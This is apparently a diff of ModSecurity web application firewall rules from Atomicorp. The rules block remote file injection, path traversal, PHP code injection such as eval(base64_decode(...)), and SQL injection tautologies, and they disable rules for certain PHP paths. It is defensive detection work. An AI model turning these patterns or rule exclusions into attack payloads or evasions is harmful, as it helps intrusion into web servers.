+SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/ref/|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/txt/|!ARGS:/text/|!ARGS:/redir/|!ARGS:/image/|!ARGS:/referrer/|!ARGS:/^S/|!ARGS:ref|!ARGS:/referer/ "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"          "deny,log,auditlog,status:403,phase:2,id:340745,chain,t:none,t:normalisePath,t:replaceNulls,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,rev:6,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS'"
+SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"
+
+SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/ref/|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/txt/|!ARGS:/text/|!ARGS:/redir/|!ARGS:/image/|!ARGS:/referrer/|!ARGS:/^S/|!ARGS:ref|!ARGS:/referer/ "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"  "deny,log,auditlog,status:403,phase:2,chain,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,multimatch,id:340760,rev:6,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS'"
+SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"
+
+
+SecMarker END_RULES_91364
+
+SecRule REQUEST_FILENAME "/flashgallery\.php" "phase:2,id:91365,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340006,ctl:ruleRemovebyID=340007"
+
+SecRule REQUEST_FILENAME "/req\.php" "phase:2,id:91366,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"
+SecAction "phase:2,id:91367,t:none,pass,nolog,skipAfter:END_RULES_91367"
+
+SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/txt/|!ARGS:/text/|!ARGS:/redir/|!ARGS:/image/|!ARGS:/^S/|!ARGS:str2 "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"          "deny,log,auditlog,status:403,phase:2,id:340761,chain,t:none,t:normalisePath,t:replaceNulls,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,rev:4,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS'"
+SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"
+
+SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/txt/|!ARGS:/text/|!ARGS:/redir/|!ARGS:/image/|!ARGS:/^S/|!ARGS:str2 "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"  "deny,log,auditlog,status:403,phase:2,chain,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,multimatch,id:340762,rev:4,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS'"
+SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"
+
+
+SecMarker END_RULES_91367
+
+SecRule REQUEST_FILENAME "/admin/patch\.php" "phase:2,id:91368,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340157,ctl:ruleRemovebyID=340160,ctl:ruleRemovebyID=344371"
+
+SecRule REQUEST_FILENAME "/etc/reality-info\.css" "phase:2,id:91369,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340009"
+
+SecRule REQUEST_FILENAME "/alt_doc\.php" "phase:2,id:91370,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=380011,ctl:ruleRemovebyID=340113,ctl:ruleRemovebyID=341211,ctl:ruleRemovebyID=340145,ctl:ruleRemovebyID=390572,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=340149"
+
+SecRule REQUEST_FILENAME "/product_modify\.php" "phase:2,id:91371,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=350149,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"
+SecAction "phase:2,id:91372,t:none,pass,nolog,skipAfter:END_RULES_91372"
+
+SecRule ARGS|!ARGS:distribution|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/txt/|!ARGS:/text/|!ARGS:/redir/|!ARGS:/image/|!ARGS:/^efields/ "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"          "deny,log,auditlog,status:403,phase:2,chain,t:none,id:340763,t:normalisePath,t:replaceNulls,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,rev:5,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS'"
+SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"
+
+SecRule ARGS|!ARGS:distribution|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/txt/|!ARGS:/text/|!ARGS:/redir/|!ARGS:/image/|!ARGS:/^efields/ "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"  "deny,log,auditlog,status:403,phase:2,chain,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,multimatch,id:340764,rev:5,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS'"
+SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"
+
+
+
+SecMarker END_RULES_91372
+
+SecRule REQUEST_FILENAME "/fix\.swf" "phase:2,id:91373,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"
+SecAction "phase:2,id:91374,t:none,pass,nolog,skipAfter:END_RULES_91374"
+
+SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/txt/|!ARGS:/text/|!ARGS:/redir/|!ARGS:/image/|!ARGS:x "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"          "deny,log,auditlog,status:403,phase:2,id:340765,chain,t:none,t:normalisePath,t:replaceNulls,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,rev:4,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS'"
+SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"
+
+SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/txt/|!ARGS:/text/|!ARGS:/redir/|!ARGS:/image/|!ARGS:x "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"  "deny,log,auditlog,status:403,phase:2,chain,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,multimatch,id:340766,rev:4,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS'"
+SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"
+
+
+SecMarker END_RULES_91374
+
+SecRule REQUEST_FILENAME "/typo3/alt_mod_frameset\.php" "phase:2,id:91375,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340006,ctl:ruleRemovebyID=340007"
+
+SecRule REQUEST_FILENAME "/cnf_config\.php" "phase:2,id:91376,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"
+SecAction "phase:2,id:91377,t:none,pass,nolog,skipAfter:END_RULES_91377"
+
+SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/txt/|!ARGS:/text/|!ARGS:/redir/|!ARGS:/image/|!ARGS:/^val_/ "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"          "deny,log,auditlog,status:403,phase:2,id:340767,chain,t:none,t:normalisePath,t:replaceNulls,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,rev:4,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS'"
+SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"
+
+SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/txt/|!ARGS:/text/|!ARGS:/redir/|!ARGS:/image/|!ARGS:/^val_/ "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"  "deny,log,auditlog,status:403,phase:2,chain,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,multimatch,id:340768,rev:4,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS'"
+SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"
+
+
+SecMarker END_RULES_91377
+
+SecRule REQUEST_FILENAME "/classes/crop_image\.php" "phase:2,id:91378,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340161"
+
+SecRule REQUEST_FILENAME "/members/create_listing\.php" "phase:2,id:91379,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"
+
+SecRule REQUEST_FILENAME "/livesupport/install/dbperform\.php" "phase:2,id:91380,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340144,ctl:ruleRemovebyID=380020,ctl:ruleRemovebyID=380019,ctl:ruleRemovebyID=340155,ctl:ruleRemovebyID=344367"
+
+SecRule REQUEST_FILENAME "/st/out\.php" "phase:2,id:91381,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"
+SecAction "phase:2,id:91382,t:none,pass,nolog,skipAfter:END_RULES_91382"
+
+SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/txt/|!ARGS:/text/|!ARGS:/redir/|!ARGS:/image/|!ARGS:u "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"          "deny,log,auditlog,status:403,phase:2,id:340769,chain,t:none,t:normalisePath,t:replaceNulls,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,rev:4,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS'"
+SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"
+
+SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/txt/|!ARGS:/text/|!ARGS:/redir/|!ARGS:/image/|!ARGS:u "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"  "deny,log,auditlog,status:403,phase:2,chain,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,multimatch,id:340770,rev:4,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS'"
+SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"
+
+
+SecMarker END_RULES_91382
+
+SecRule REQUEST_FILENAME "/db_sql\.php" "phase:2,id:91383,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340016,ctl:ruleRemovebyID=340017,ctl:ruleRemovebyID=340144,ctl:ruleRemovebyID=340145,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=331026,ctl:ruleRemovebyID=331027,ctl:ruleRemovebyID=331028,ctl:ruleRemovebyID=340146,ctl:ruleRemovebyID=340155,ctl:ruleRemovebyID=344367,ctl:ruleRemovebyID=340156,ctl:ruleRemovebyID=340157,ctl:ruleRemovebyID=340159,ctl:ruleRemovebyID=340160,ctl:ruleRemovebyID=344371,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163,ctl:ruleRemovebyID=340164,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=380019,ctl:ruleRemovebyID=380020,ctl:ruleRemovebyID=380022,ctl:ruleRemovebyID=380121,ctl:ruleRemovebyID=380122,ctl:ruleRemovebyID=380023,ctl:ruleRemovebyID=380024,ctl:ruleRemovebyID=380025,ctl:ruleRemovebyID=381025,ctl:ruleRemovebyID=380126,ctl:ruleRemovebyID=390572,ctl:ruleRemovebyID=340144,ctl:ruleRemovebyID=380020,ctl:ruleRemovebyID=380019,ctl:ruleRemovebyID=340155,ctl:ruleRemovebyID=344367"
+
+SecRule REQUEST_FILENAME "/catch\.php" "phase:2,id:91384,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"
+SecAction "phase:2,id:91385,t:none,pass,nolog,skipAfter:END_RULES_91385"
+
+SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/txt/|!ARGS:/text/|!ARGS:/redir/|!ARGS:/image/|!ARGS:ru "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"          "deny,log,auditlog,status:403,phase:2,id:340771,chain,t:none,t:normalisePath,t:replaceNulls,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS'"
+SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"
+
+SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/txt/|!ARGS:/text/|!ARGS:/redir/|!ARGS:/image/|!ARGS:ru "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"  "deny,log,auditlog,status:403,phase:2,chain,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,multimatch,id:340772,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS'"
+SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"
+
+
+SecMarker END_RULES_91385
+
+SecRule REQUEST_FILENAME "/admin/languages\.php" "phase:2,id:91386,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"
+SecAction "phase:2,id:91387,t:none,pass,nolog,skipAfter:END_RULES_91387"
+
+SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/txt/|!ARGS:/text/|!ARGS:/redir/|!ARGS:/image/|!ARGS:/^var_value/ "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"          "deny,log,auditlog,status:403,phase:2,id:340775,chain,t:none,t:normalisePath,t:replaceNulls,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS'"
+SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"
+
+SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/txt/|!ARGS:/text/|!ARGS:/redir/|!ARGS:/image/|!ARGS:/^var_value/ "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"  "deny,log,auditlog,status:403,phase:2,chain,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,multimatch,id:340776,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS'"
+SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"
+
+
+SecMarker END_RULES_91387
+
+SecRule REQUEST_FILENAME "/slideshow/admin/p\.php" "phase:2,id:91388,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340151,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"
+SecAction "phase:2,id:91389,t:none,pass,nolog,skipAfter:END_RULES_91389"
+
+SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/txt/|!ARGS:/text/|!ARGS:/redir/|!ARGS:/image/|!ARGS:a "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"          "deny,log,auditlog,status:403,phase:2,id:341776,chain,t:none,t:normalisePath,t:replaceNulls,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS'"
+SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"
+
+SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/txt/|!ARGS:/text/|!ARGS:/redir/|!ARGS:/image/|!ARGS:a "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"  "deny,log,auditlog,status:403,phase:2,chain,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,multimatch,id:341778,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS'"
+SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"
+
+
+SecMarker END_RULES_91389
+
+SecRule REQUEST_FILENAME "/wp-admin/theme-editor\.php" "phase:2,id:91390,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340855,ctl:ruleRemovebyID=340095,ctl:ruleRemovebyID=380026,ctl:ruleRemovebyID=340155,ctl:ruleRemovebyID=344367,ctl:ruleRemovebyID=344367,ctl:ruleRemovebyID=340159,ctl:ruleRemovebyID=340157,ctl:ruleRemovebyID=380020,ctl:ruleRemovebyID=340011,ctl:ruleRemovebyID=380006,ctl:ruleRemovebyID=340213,ctl:ruleRemovebyID=340029,ctl:ruleRemovebyID=340113,ctl:ruleRemovebyID=341211,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=350149,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149,ctl:ruleRemovebyID=340128,ctl:ruleRemovebyID=341045,ctl:ruleRemovebyID=390715,ctl:ruleRemovebyID=340006"
+SecAction "phase:2,id:91391,t:none,pass,nolog,skipAfter:END_RULES_91391"
+
+SecRule REQUEST_URI "!(alt_mod_frameset.php|checkout_shipping.php|^/components/com_zoom/etc/|/admin\.swf\?nick=|/editor/filemanager/browser/default/browser\.html\?(Type=Image&)?Connector=\.\./\.\./connectors)" 	"t:none,t:urlDecodeUni,t:compressWhitespace,t:lowercase,deny,status:403,phase:2,chain,log,auditlog,t:normalisePath,id:340671,rev:19,severity:2,msg:'Atomicorp.com WAF Rules: Generic Path Recursion denied in URI/ARGS', chain"
+SecRule REQUEST_URI|ARGS|!ARGS:webpage[content]|!ARGS:article[content]|!ARGS:filecontent|!ARGS:/text/|!ARGS:/message/|!ARGS:/^fck_/|!ARGS:htmlSource|!ARGS:path_to_lzx|!ARGS:content|!ARGS:newcontent "(?:\.\./\.\./|\.\|\./\.\|\./\.\.)"
+
+#PHP injection
+SecRule REQUEST_FILENAME|ARGS_NAMES|ARGS|XML:/*|!ARGS:/content/|!ARGS:/descripcion/|!ARGS:/text/|!ARGS:/description/|!ARGS:/resolution/|!ARGS:/message/|!ARGS:/msg/ "\b(?:f(?:tp_(?:nb_)?f?(?:ge|pu)t|get(?:s?s|c)|scanf|write|open|read)|(?:g|b)z(?:(?:encod|writ)e|compress|open|read)|s(?:ession_start|candir)|read(?:(?:(?:g|b)z)?file|dir)|gzinflate|base64_decode|str_rot13|move_uploaded_file|(?:proc_|bz)open|call_user_func|$_(?:(?:pos|ge)t|session))\b" "phase:2,deny,log,status:403,rev:4,capture,t:none,t:htmlEntityDecode,t:compressWhitespace,t:lowercase,ctl:auditLogParts=+E,auditlog,msg:'Atomicorp.com WAF Rules:  PHP Injection Attack',id:'390725',logdata:'%{TX.0}',severity:'2'"
+
+SecRule ARGS|!ARGS:newcontent|!ARGS:khxc_incphp--filename|!ARGS:file_contents|!ARGS:filecontent|!ARGS:message|!ARGS:defaultParamList|!ARGS:body|!ARGS:gbu0_proddetdisp--incdisp "(?:or.+1[[:space:]]*=[[:space:]][0-9]|(?:or 1=[0-9]|'.+)--'|null is null)" 	"t:urlDecodeUni,t:urlDecodeUni,t:compressWhitespace,t:lowercase,phase:2,deny,status:403,id:340777,log,auditlog,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Generic SQL injection protection'"
+SecRule ARGS "(?:(?:eval|passthru) ?\( ?(?:base64_decode|gz(?:inflate|decode|encode)) ?\(|str_rot13 ?\()"  "t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,multimatch,id:345729,rev:1,log,auditlog,severity:2,msg:'Atomicorp.com WAF Rules: Potentially malicious code injection via WP theme-editor',deny,status:403,phase:2"
+SecRule ARGS "(?:(?:eval|passthru) ?\( ?(?:base64_decode|gz(?:inflate|decode|encode)) ?\(|str_rot13 ?\()"  "t:none,t:urlDecodeUni,t:compressWhitespace,t:lowercase,id:345730,rev:1,severity:2,log,auditlog,msg:'Atomicorp.com WAF Rules: Potentially malicious code injection via WP theme-editor',deny,status:403,phase:2"
+SecRule ARGS "(?:(?:eval|passthru) ?\( ?(?:base64_decode|gz(?:inflate|decode|encode)) ?\(|str_rot13 ?\()"  "t:none,t:compressWhitespace,t:lowercase,id:345731,rev:1,severity:2,log,auditlog,msg:'Atomicorp.com WAF Rules: Potentially malicious code injection via WP theme-editor',deny,status:403,phase:2"
+
+SecMarker END_RULES_91391
+
+SecRule REQUEST_FILENAME "/components/com_oziogallery/preview\.swf" "phase:2,id:91392,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"
+SecAction "phase:2,id:91393,t:none,pass,nolog,skipAfter:END_RULES_91393"
+
+SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/txt/|!ARGS:/text/|!ARGS:/redir/|!ARGS:/image/|!ARGS:xmlPath "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"          "phase:2,deny,log,auditlog,status:403,id:340779,chain,t:none,t:normalisePath,t:replaceNulls,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS'"
+SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"
+
+SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/txt/|!ARGS:/text/|!ARGS:/redir/|!ARGS:/image/|!ARGS:xmlPath "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"  "phase:2,deny,log,auditlog,status:403,chain,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,multimatch,id:340780,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS'"
+SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"
+
+
+SecMarker END_RULES_91393
+
+SecRule REQUEST_FILENAME "/fla_music\.swf" "phase:2,id:91394,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340006,ctl:ruleRemovebyID=340007"
+
+SecRule REQUEST_FILENAME "/mickadmincp/user\.php" "phase:2,id:91395,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"
+SecAction "phase:2,id:91396,t:none,pass,nolog,skipAfter:END_RULES_91396"
+
+SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/txt/|!ARGS:/text/|!ARGS:/redir/|!ARGS:/image/|!ARGS:/^userfield/|!ARGS:user[homepage] "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"          "phase:2,deny,log,auditlog,status:403,id:340781,chain,t:none,t:normalisePath,t:replaceNulls,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS'"
+SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"
+
+SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/txt/|!ARGS:/text/|!ARGS:/redir/|!ARGS:/image/|!ARGS:/^userfield/|!ARGS:user[homepage] "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"  "phase:2,deny,log,auditlog,status:403,chain,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,multimatch,id:340782,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS'"
+SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"
+
+
+SecMarker END_RULES_91396
+
+SecRule REQUEST_FILENAME "/wp-admin/tools\.php" "phase:2,id:91397,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=380006,ctl:ruleRemovebyID=390707,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"
+
+SecRule REQUEST_FILENAME "/includes/c0ntaktu3\.php" "phase:2,id:91398,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"
+SecAction "phase:2,id:91399,t:none,pass,nolog,skipAfter:END_RULES_91399"
+
+SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/txt/|!ARGS:/text/|!ARGS:/redir/|!ARGS:/image/|!ARGS:bad_template "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"          "phase:2,deny,log,auditlog,status:403,id:340785,chain,t:none,t:normalisePath,t:replaceNulls,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS'"
+SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"
+
